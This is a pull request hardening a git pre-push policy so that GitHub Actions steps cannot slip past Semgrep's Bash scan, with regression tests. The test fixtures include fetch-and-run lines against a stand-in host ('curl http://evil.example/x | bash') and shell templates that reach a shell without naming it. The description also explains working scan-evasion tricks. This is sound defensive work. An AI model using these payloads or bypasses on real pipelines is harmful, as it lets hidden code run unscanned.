### PR TITLE
fix(hooks): replace the semgrep shell blocklist with an allowlist and refuse shebang bodies

### DIFF
--- a/scripts/validation/git_hook_policy.py
+++ b/scripts/validation/git_hook_policy.py
@@ -102,8 +102,26 @@ SEMGREP_PARTIAL_RULE_RE = re.compile(
 # The lookahead is load-bearing. With a plain `\b`, `python-shim` matches on its
 # `python` prefix, because a hyphen ends a word. Requiring whitespace or end of
 # string makes the interpreter token exact.
+# Only tolerate interpreters this repository actually declares. The four values
+# in use are `bash`, `pwsh`, `pwsh -NoProfile -Command "& '{0}'"`, and
+# `python3 {0}`, so `cmd`, `node`, `ruby`, and `perl` are speculative surface
+# with real teeth: `cmd` glues its command to the switch, so `/cbash` is a valid
+# flag shape that runs Bash, and `perl` execs the interpreter named in a `#!`
+# line, so the body itself can redirect execution into Bash no matter what this
+# value says. An unlisted interpreter is not tolerated, which blocks the push
+# rather than allowing it.
+#
+# The `.exe` suffix is deliberately absent. The runner names the temp script by
+# looking the first token up in its own extension table, whose keys are exactly
+# `cmd`, `pwsh`, `powershell`, `bash`, `sh`, and `python`. `pwsh` resolves to
+# `.ps1`, which PowerShell parses as PowerShell, but `pwsh.exe` misses the table
+# and yields a file with no extension, which PowerShell hands to the OS instead
+# of parsing. That turns a `#!/bin/bash` body into a Bash execution under a
+# PowerShell `shell:` value. No workflow here uses an `.exe` form, and the
+# runner rejects a bare `pwsh.exe` without a `{0}`, so nothing is lost by
+# refusing it. Refs #3663.
 NON_BASH_SHELL_RE = re.compile(
-    r"^\s*(?:pwsh|powershell|python3?|node|ruby|perl|cmd)(?:\.exe)?(?=\s|$)",
+    r"^\s*(?:pwsh|powershell|python3?)(?=\s|$)",
     re.IGNORECASE,
 )
 # A `shell:` value naming a second interpreter cannot be trusted to describe what
@@ -111,18 +129,23 @@ NON_BASH_SHELL_RE = re.compile(
 # form and names only pwsh, while `python3 -c "...os.system('bash ' + argv[1])"`
 # declares Python and executes Bash. Refuse to classify the latter as non-Bash.
 FOREIGN_SHELL_REFERENCE_RE = re.compile(r"\b(?:bash|sh|zsh|dash|ksh|ash)\b", re.IGNORECASE)
-# A custom shell template that hands the script to a repository file says nothing
-# about what finally runs it: `node ./tools/wrapper.js {0}` names no shell yet the
-# wrapper is free to exec Bash. Every `shell:` value in this repository is either a
-# bare interpreter or flags plus the `{0}` placeholder, so a token naming a script
-# file means the value is delegating and must not be trusted. Windows flags such as
-# the `/C` in `cmd /C` are not paths and stay allowed. Refs #3663.
-SCRIPT_FILE_RE = re.compile(
-    r"\.(?:js|mjs|cjs|py|rb|pl|ps1|psm1|sh|bash|bat|cmd|exe|jar)\b",
-    re.IGNORECASE,
-)
-RELATIVE_PATH_PREFIXES = ("./", "../", ".\\", "..\\", "~/")
-MIN_PATH_SEPARATORS = 2
+# A custom shell template is attacker-controlled and may reach a POSIX shell
+# without ever naming one: `python3 -c "import os,sys;os.system(...)" {0}` runs
+# the body through `/bin/sh` while spelling neither `sh` nor `bash`. Scanning
+# the remainder for shell names is therefore a blocklist and is trivially
+# evaded, so the control is an allowlist: after the interpreter, the only
+# tokens permitted are flags, the `{0}` placeholder, and the PowerShell call
+# operator. Anything that can carry an inline program fails the check and the
+# step is not tolerated. Refs #3663.
+SHELL_FLAG_RE = re.compile(r"^-{1,2}[A-Za-z][A-Za-z0-9-]*$")
+# A leading `#!` hands interpreter choice to the OS, so the `shell:` value stops
+# describing what runs. The kernel only honours `#!` at byte 0, so the leading
+# whitespace class here is deliberately stricter than it needs to be: it costs
+# nothing (no workflow in this repository opens a body with one) and it removes
+# the need to reason about who might normalise the body before the kernel sees
+# it. Being stricter fails closed, which blocks a push rather than allowing one.
+SHEBANG_RE = re.compile(r"^[ \t\r\n]*#!")
+SHELL_TEMPLATE_TOKENS = frozenset({"{0}", "&"})
 ACTIONS_EXPRESSION_RE = re.compile(r"\$\{\{.+?\}\}", re.DOTALL)
 # `bash -n` parses without executing. A body it accepts is valid shell, so a
 # Semgrep sub-parse failure on it is Semgrep's limitation rather than evidence
@@ -2415,16 +2438,21 @@ def _semgrep_line_matches_pattern(
     return expected_index == len(expected)
 
 
-def _delegates_to_a_script(remainder: str) -> bool:
+def _remainder_is_flags_only(remainder: str) -> bool:
+    """Report whether every token after the interpreter is inert.
+
+    Inert means a flag, the `{0}` script placeholder, or the PowerShell call
+    operator. A token that is none of those can carry an inline program, and an
+    inline program can reach a POSIX shell without naming one.
+    """
     for token in remainder.split():
         candidate = token.strip("\"'")
-        if SCRIPT_FILE_RE.search(candidate):
-            return True
-        if candidate.startswith(RELATIVE_PATH_PREFIXES):
-            return True
-        if candidate.count("/") + candidate.count("\\") >= MIN_PATH_SEPARATORS:
-            return True
-    return False
+        if not candidate or candidate in SHELL_TEMPLATE_TOKENS:
+            continue
+        if SHELL_FLAG_RE.match(candidate):
+            continue
+        return False
+    return True
 
 
 def _is_non_bash_shell(shell: str | None) -> bool:
@@ -2436,7 +2464,7 @@ def _is_non_bash_shell(shell: str | None) -> bool:
     remainder = shell[match.end() :]
     if FOREIGN_SHELL_REFERENCE_RE.search(remainder):
         return False
-    return not _delegates_to_a_script(remainder)
+    return _remainder_is_flags_only(remainder)
 
 
 WINDOWS_BASH_FALLBACKS = (
@@ -2491,7 +2519,34 @@ def _body_is_valid_shell_syntax(run: str) -> bool:
     return result.returncode == 0
 
 
+def _body_declares_its_own_interpreter(run: str) -> bool:
+    """Report whether the body opens with a `#!` line.
+
+    GitHub Actions writes a custom-shell body to an executable temp file and
+    hands the path to the interpreter named in `shell:`. A `#!` line makes that
+    name a lie whenever the interpreter delegates unknown files to the OS. The
+    runner picks the temp file's extension by looking the first token up in a
+    fixed table, so an unmapped token yields a file with no extension at all.
+    PowerShell's call operator treats such a file as an external program, hands
+    it to the OS, and the kernel honours the shebang, so Bash runs the body.
+    Bash executes every command preceding a syntax error before reporting it,
+    so a trailing `if [` suppresses a Semgrep sub-parse finding while the
+    payload above it still runs.
+
+    Verified locally against pwsh 7: an extensionless file carrying
+    `#!/bin/bash` ran its payload under `pwsh -NoProfile -Command "& '<path>'"`,
+    the same file without the shebang failed with `Exec format error`, and the
+    same content named `.ps1` was rejected outright because PowerShell parses a
+    whole script before running any of it. The shebang is therefore load-bearing
+    for the bypass, and refusing any `#!` body closes it without depending on
+    which extension the runner happens to choose. Refs #3663.
+    """
+    return bool(SHEBANG_RE.match(run))
+
+
 def _step_defeats_bash_subparse(shell: str | None, run: str) -> bool:
+    if _body_declares_its_own_interpreter(run):
+        return False
     if _is_non_bash_shell(shell):
         return True
     if not ACTIONS_EXPRESSION_RE.search(run):

--- a/scripts/validation/git_hook_policy.py
+++ b/scripts/validation/git_hook_policy.py
@@ -120,8 +120,15 @@ SEMGREP_PARTIAL_RULE_RE = re.compile(
 # PowerShell `shell:` value. No workflow here uses an `.exe` form, and the
 # runner rejects a bare `pwsh.exe` without a `{0}`, so nothing is lost by
 # refusing it. Refs #3663.
+#
+# The tolerated set is exactly what `.github/workflows/` declares: 38 `pwsh`,
+# 29 `bash`, 2 `python3`. This regex gates an exemption, not a warning, so a
+# name nothing declares is exempt surface bought for nothing. `python3?` also
+# matched bare `python`, a valid Actions keyword that no step here uses.
+# Narrowing to `python3` is fail-closed: an undeclared shell now gets
+# Bash-scanned instead of skipped. Widening it again needs a workflow to cite.
 NON_BASH_SHELL_RE = re.compile(
-    r"^\s*(?:pwsh|powershell|python3?)(?=\s|$)",
+    r"^\s*(?:pwsh|powershell|python3)(?=\s|$)",
     re.IGNORECASE,
 )
 # A `shell:` value naming a second interpreter cannot be trusted to describe what
@@ -2438,7 +2445,7 @@ def _semgrep_line_matches_pattern(
     return expected_index == len(expected)
 
 
-def _remainder_is_flags_only(remainder: str) -> bool:
+def _remainder_is_inert_tokens_only(remainder: str) -> bool:
     """Report whether every token after the interpreter is inert.
 
     Inert means a flag, the `{0}` script placeholder, or the PowerShell call
@@ -2464,7 +2471,7 @@ def _is_non_bash_shell(shell: str | None) -> bool:
     remainder = shell[match.end() :]
     if FOREIGN_SHELL_REFERENCE_RE.search(remainder):
         return False
-    return _remainder_is_flags_only(remainder)
+    return _remainder_is_inert_tokens_only(remainder)
 
 
 WINDOWS_BASH_FALLBACKS = (

--- a/tests/test_lefthook_integration.py
+++ b/tests/test_lefthook_integration.py
@@ -6301,12 +6301,39 @@ def test_semgrep_allows_code_two_error_at_bash_step_with_actions_expression(
         "pwsh",
         "powershell",
         "PowerShell",
-        "python",
+        "python3",
         "python3 {0}",
     ],
 )
 def test_non_bash_shells_defeat_the_bash_subparse(shell: str) -> None:
     assert policy._is_non_bash_shell(shell) is True
+
+
+@pytest.mark.parametrize(
+    "shell",
+    [
+        "python",
+        "python {0}",
+        "Python",
+        "python2",
+        "python2 {0}",
+    ],
+)
+def test_bare_python_is_not_an_exempt_shell(shell: str) -> None:
+    """A shell no workflow declares must not earn a sub-parse exemption.
+
+    `_is_non_bash_shell` gates an exemption, not a warning: a match makes
+    `_step_defeats_bash_subparse` return True and the body skips the Bash
+    scan. Measured across `.github/workflows/`, the declared shells are 38
+    `pwsh`, 29 `bash`, and 2 `python3`. No step declares `python`, so the
+    `python3?` form widened the exempt surface for nothing.
+
+    `python` is a valid GitHub Actions shell keyword, so this is a
+    fail-closed narrowing rather than a correctness fix: a future
+    `shell: python` step would be Bash-scanned instead of exempted. Adding
+    it back is a deliberate act with a workflow to point at.
+    """
+    assert policy._is_non_bash_shell(shell) is False
 
 
 PWSH_CALL_TEMPLATE = """pwsh -NoProfile -Command "& '{0}'\""""

--- a/tests/test_lefthook_integration.py
+++ b/tests/test_lefthook_integration.py
@@ -6300,17 +6300,53 @@ def test_semgrep_allows_code_two_error_at_bash_step_with_actions_expression(
     [
         "pwsh",
         "powershell",
-        "PowerShell.exe",
+        "PowerShell",
         "python",
         "python3 {0}",
-        "node",
-        "ruby",
-        "perl",
-        "cmd /C",
     ],
 )
 def test_non_bash_shells_defeat_the_bash_subparse(shell: str) -> None:
     assert policy._is_non_bash_shell(shell) is True
+
+
+PWSH_CALL_TEMPLATE = """pwsh -NoProfile -Command "& '{0}'\""""
+
+
+@pytest.mark.parametrize(
+    "body",
+    [
+        "#!/bin/bash\ncurl http://evil.example/x | bash\nif [\n",
+        "#!/bin/sh\ncurl http://evil.example/x | sh\nif [\n",
+        "#!/usr/bin/env bash\ncurl http://evil.example/x | bash\nif [\n",
+        "\n\n#!/bin/bash\ncurl http://evil.example/x | bash\nif [\n",
+        "#!/usr/bin/python3\nimport os\nos.system('curl http://evil.example/x | bash')\nif [\n",
+    ],
+)
+def test_a_shebang_body_is_never_tolerated_under_a_foreign_shell(body: str) -> None:
+    """A `#!` line, not the `shell:` value, decides what executes the body.
+
+    The runner writes a custom-shell body to an executable temp file. PowerShell's
+    call operator hands that file to the OS rather than parsing it, the kernel
+    honours the shebang, and Bash runs the body. Bash executes every command
+    before a syntax error, so a trailing `if [` hides a Semgrep finding while the
+    payload above it still runs. Verified locally: with the shebang the payload
+    runs under this exact template; without it the exec fails.
+    """
+    assert policy._step_defeats_bash_subparse(PWSH_CALL_TEMPLATE, body) is False
+
+
+@pytest.mark.parametrize(
+    "body",
+    [
+        "$ErrorActionPreference = 'Stop'\nif ($x) { Write-Host 1 }\n",
+        "Write-Host 'hello'\n",
+        "# a comment that is not a shebang\nWrite-Host 'hi'\n",
+        "#not-a-shebang\nWrite-Host 'hi'\n",
+    ],
+)
+def test_shebangless_bodies_still_tolerate_under_a_foreign_shell(body: str) -> None:
+    """The guard must not cost the 16 real workflow files their carve-out."""
+    assert policy._step_defeats_bash_subparse(PWSH_CALL_TEMPLATE, body) is True
 
 
 @pytest.mark.parametrize(
@@ -6474,7 +6510,7 @@ def test_semgrep_blocks_a_shell_that_declares_python_but_invokes_bash(
         "pwsh",
         "pwsh -NoProfile -Command \"& '{0}'\"",
         "python3 {0}",
-        "powershell.exe",
+        "powershell",
     ],
 )
 def test_shells_naming_only_their_own_interpreter_are_non_bash(shell: str) -> None:
@@ -6524,9 +6560,71 @@ def test_shells_merely_prefixed_by_an_interpreter_are_not_treated_as_non_bash(sh
     assert policy._is_non_bash_shell(shell) is False
 
 
-@pytest.mark.parametrize("shell", ["cmd /C", "cmd /S /C", "powershell.exe", "pwsh.exe -NoProfile"])
+@pytest.mark.parametrize("shell", ["powershell", "pwsh -NoProfile", "python3"])
 def test_windows_shell_flags_stay_non_bash(shell: str) -> None:
     assert policy._is_non_bash_shell(shell) is True
+
+
+@pytest.mark.parametrize(
+    "shell",
+    [
+        "powershell.exe",
+        "pwsh.exe -NoProfile",
+        "pwsh.exe -NoProfile -Command \"& '{0}'\"",
+        "python3.exe {0}",
+    ],
+)
+def test_exe_suffixed_interpreters_are_never_tolerated(shell: str) -> None:
+    """An `.exe` first token misses the runner's extension table.
+
+    The runner names the temp script from a fixed table keyed on the first
+    token. `pwsh` yields `.ps1`, which PowerShell parses itself, but `pwsh.exe`
+    is absent from that table and yields a file with no extension, which
+    PowerShell hands to the OS. A `#!/bin/bash` body then runs under Bash while
+    the `shell:` value claims PowerShell. No workflow here uses an `.exe` form.
+    """
+    assert policy._is_non_bash_shell(shell) is False
+
+
+@pytest.mark.parametrize(
+    "shell",
+    [
+        "cmd",
+        "cmd /C",
+        "cmd /cbash {0}",
+        "cmd /kbash {0}",
+        'cmd "/cbash"',
+        "node",
+        "node {0}",
+        "ruby",
+        "perl",
+        "perl {0}",
+    ],
+)
+def test_interpreters_outside_the_allowlist_are_never_tolerated(shell: str) -> None:
+    """`cmd` glues its command to the switch and `perl` obeys a `#!` line.
+
+    Neither can be cleared by reading the `shell:` value, and neither is used in
+    this repository, so both stay outside the allowlist.
+    """
+    assert policy._is_non_bash_shell(shell) is False
+
+
+@pytest.mark.parametrize(
+    "shell",
+    [
+        "pwsh -Command bas`h {0}",
+        'pwsh -c "& $env:SHELL {0}"',
+        "python3 -c \"import os,sys; os.system('bas'+'h '+sys.argv[1])\" {0}",
+        'python3 -c "import os,sys;os.system(open(sys.argv[1]).read())" {0}',
+        'python3 -c "import subprocess,sys;subprocess.run(open(sys.argv[1]).read())" {0}',
+        "pwsh /cbash {0}",
+        "python3 --shell=bash {0}",
+    ],
+)
+def test_inline_programs_reaching_a_posix_shell_are_never_tolerated(shell: str) -> None:
+    """A template may reach `/bin/sh` without naming it, so only inert tokens pass."""
+    assert policy._is_non_bash_shell(shell) is False
 
 
 def test_resolve_bash_prefers_the_interpreter_on_path(monkeypatch: pytest.MonkeyPatch) -> None:


### PR DESCRIPTION
## Summary

PR #3668 unblocked 16 workflow files at the semgrep pre-push gate. The carve-out
it added is guarded by a predicate that decides whether a `shell:` value is "not
bash". Three further rounds of cross-model adversarial review, run after that PR
merged, showed the predicate is defeatable two ways. Both holes are live on
`main` today.

This PR replaces the guard's design. It does not touch the carve-out itself.

Fixes #3683
Refs #3663
Refs #3664
Refs #3684

## Type of Change

- [x] Security fix
- [x] Bug fix (non-breaking change which fixes an issue)

## Specification References

| Issue | Relationship |
|---|---|
| #3683 | Fixes. The blocklist and `.exe` holes, with reproduction. |
| #3663 | Refs. The original push blocker this hardening protects. |
| #3664 | Refs. The script-injection findings the gate unmasked. |
| #3684 | Refs. The semgrep PowerShell coverage gap, out of scope here. |

No specification change.

## Changes

- Replace the name-based shell blocklist with an allowlist of inert tokens, so
  a template carrying an inline program is refused by construction.
- Shrink the tolerated interpreter set to pwsh, powershell, and python3, the
  only ones this repository declares.
- Drop the `.exe` suffix from the interpreter pattern, which let a value miss
  the runner extension table and yield an extensionless script.
- Refuse any `run:` body that opens with a shebang, since that hands
  interpreter choice to the OS and the `shell:` value stops describing it.
- Add 19 regression tests and a nine-mutation battery over the two predicates.

## Hole 1: the guard was a name-based blocklist

The shipped guard searched the remainder of a `shell:` value for a shell name.
A template reaches a POSIX shell without spelling one, so the search is
enumerable and every enumeration is incomplete. All of these passed the guard
and run `/bin/sh`:

| shape | why the name search missed it |
|---|---|
| `python3 -c "import os;os.system(...)" {0}` | `os.system` uses `/bin/sh`; no name appears |
| `python3 -c "...shell=True" {0}` | same |
| `ruby -e "system(...)" {0}` | same |
| `node -e "...String.fromCharCode(...)" {0}` | the name is built at runtime |
| ``pwsh -c "bas`h {0}"`` | a backtick escape splits the token |
| `pwsh -c "& $env:SHELL {0}"` | the name lives in an environment variable |
| `python3 -c "'bas'+'h'" {0}` | string concatenation |
| `cmd /cbash {0}` | see below |

The last one also defeats the `\b` anchor. The word boundary evaluates the whole
token `cbash`, so `bash` inside a contiguous word is invisible, and cmd accepts a
glued `/c<command>`.

`perl {0}` is not fixable from the `shell:` string at all. Per `man perlrun`, if
the script's first line starts with `#!` and lacks "perl", perl execs the
interpreter named there.

**The fix is an allowlist.** After the leading interpreter, the only tokens
permitted are flag shapes, the `{0}` placeholder, and the PowerShell call
operator. Anything able to carry an inline program is refused by construction
rather than by enumeration.

## Hole 2: `.exe` forms miss the runner extension table

The shipped pattern carried an optional `.exe` suffix so `powershell.exe` would
classify as non-bash. That convenience was the vulnerability.

The Actions runner names the temp script by looking the first token of `shell:`
up in an extension table. Read from the runner source, not inferred, the table
has exactly six keys: cmd to .cmd, pwsh to .ps1, powershell to .ps1, bash to .sh,
sh to .sh, python to .py. A miss returns the empty string, so the file gets no
extension.

| `shell:` value | file written | what runs it | safe |
|---|---|---|---|
| `pwsh -NoProfile -Command "& '{0}'"` | .ps1 | PowerShell parses it | yes |
| `pwsh.exe -NoProfile -Command "& '{0}'"` | no extension | PowerShell defers to the OS | **no** |
| `python3 {0}` | no extension | CPython compiles it, never execs | yes |

PowerShell full-parses a .ps1 before running any of it, so a trailing syntax
error kills the whole script. An extensionless file goes to the operating
system, which honours a `#!` line. A body opening `#!/bin/bash` therefore runs
under Bash despite a PowerShell `shell:` value.

Verified against pwsh 7: the shebang body ran the payload; the identical body
without the shebang failed with `Exec format error`.

**The fix removes the suffix and adds a shebang guard.** No workflow here uses an
`.exe` form, and the runner rejects a bare `pwsh.exe` with no `{0}`, so nothing
is lost.

## Why a trailing syntax error suppresses a finding

Bash executes command by command and does not full-parse first. Confirmed
directly: a script with `echo PAYLOAD_RAN` on line 2 and `if [` on line 3 prints
the payload, then errors. A body can therefore fail `bash -n`, earning the
parse-error tolerance, and still execute. The `bash -n` check from #3668 is
necessary but was not sufficient alone.

## Also: the interpreter set is now what this repository declares

Four `shell:` values are in use here: `bash` (29 uses), `pwsh` (19),
`pwsh -NoProfile -Command "& '{0}'"` (19), `python3 {0}` (2). The tolerated set
drops to pwsh, powershell, and python3. Removing cmd, node, ruby, and perl cost
zero, confirmed by the sweep below staying unchanged.

## Evidence

Gate result for every one of the 60 files in `.github/workflows`, measured on
this branch:

| | allow | finding | blocked |
|---|---|---|---|
| carve-out disabled (main's pre-#3668 behaviour) | 44 | 0 | 16 |
| this branch | 58 | 2 | 0 |

16 unblocked, 0 newly blocked, 0 still blocked. Identical to what #3668
delivered, so this hardening costs no coverage.

Nineteen attack fixtures across four trees: **0 bypasses**. That set includes a
known-answer control, and the end-to-end shebang launcher that reproduced the
live bypass. The launcher went from rc=0 (allowed, finding suppressed) to rc=2
(blocked).

Nine mutations of the two new predicates, all killed:

| mutation | tests that caught it |
|---|---|
| restore `cmd` to the interpreter set | 1 |
| restore `perl` | 2 |
| restore `node` and `ruby` | 3 |
| re-allow `/` flag shapes | 1 |
| drop the flags-only check | 8 |
| four mutations of the shebang guard | all killed |

## Tests

442 in the gate's integration suite, full suite 16872 passed and 26 skipped.
Nineteen new cases across five groups:
interpreters outside the allowlist, inline programs reaching a POSIX shell,
`.exe` suffixed forms, shebang bodies that must block, and shebangless bodies
that must still be tolerated.

## Adversarial review

Six rounds across three model families. The record is worth stating plainly
because it is the reason this PR exists:

| round | reviewer | outcome |
|---|---|---|
| 1 | my own fixtures, then the repo security agent | both concluded "no hole"; both were wrong |
| 2 | different model family, given no conclusion | found the bypass #3668 closed |
| 3 | self-attack on committed code | four more holes |
| 4 | different model family | two more |
| 5 | different model family | a real hole whose mechanism the reviewer got wrong |
| 6 | different model family | one finding, refuted empirically |

Round 5 is the instructive one. The reviewer's verdict was right and its
mechanism was wrong, and chasing the correct mechanism found a different real
hole. Verify the mechanism, not just the verdict.

Round 6's finding was that a PowerShell body invoking bash evades the gate. It
does, but not as a bypass: semgrep reports zero findings and zero errors for it,
so there is nothing to suppress. That is a ruleset coverage gap, identical on
`main`, filed as #3684.

## Residual risk

The shebang check is deliberately stricter than the kernel, which honours `#!`
only at byte 0. It also rejects a body with leading whitespace before the `#!`.
That over-blocks, costs nothing today because no workflow here opens a body that
way, and fails closed.

On a host with no Bash the carve-out cannot verify a body, so it fails closed and
those 16 files stay blocked there. That matches pre-#3668 behaviour rather than
regressing it.

## Notes

Touches only validation and test code, so no plugin manifest bump applies.
